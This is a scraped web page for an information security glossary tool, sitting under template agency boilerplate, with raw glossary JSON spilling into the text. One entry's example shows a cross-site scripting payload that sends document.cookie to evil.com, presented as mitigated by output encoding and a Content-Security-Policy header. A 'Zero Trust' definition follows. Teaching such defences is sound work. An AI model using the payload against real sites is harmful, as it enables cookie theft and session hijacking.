Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

Reference Tool

Information Security Glossary

Every term, acronym, and concept from the Information Security Hub — defined clearly, connected to related ideas, and tagged by difficulty level.

Loading...
Beginner
Intermediate
Advanced
Expert
Search or browse alphabetically below
🔍

Select a term to explore

Click any term from the list, or search above

Response:

Results for:

# MITIGATED — output encoding + Content Security Policy header Response Header: Content-Security-Policy: default-src 'self'; script-src 'self' Response Body:

Results for: <script>document.location='https://evil.com/steal?c='+document.cookie</script>

# Encoded output renders as plain text; CSP blocks inline script execution" }, "articleSlug": null }, { "id": "zero-trust", "term": "Zero Trust", "letter": "Z", "difficulty": "intermediate", "category": "Defenses", "aliases": [ "Zero Trust Architecture", "ZTA" ], "definition": "A security model based on the principle of 'never trust, always verify.' Zero Trust assumes no implicit trust based on network location — every access request is fully authenticated, authorized, and encrypted regardless of whether it originates inside or outside the network perimeter. NIST SP 800-207 defines the architecture. Key tenets: verify explicitly, use least-privilege access, and assume breach.", "related": [ { "id": "least-privilege", "weight": 3 }, { "id": "mfa", "weight": 2 }, { "id": "defense-in-depth", "weight": 2 }, { "id": "access-control", "weight": 2 }, { "id": "network-segmentation", "weight": 2 }, { "id": "vpn", "weight": 2 } ], "example": null, "articleSlug": null, "authorityUrl": "https://csrc.nist.gov/glossary/term/zero_trust" } ];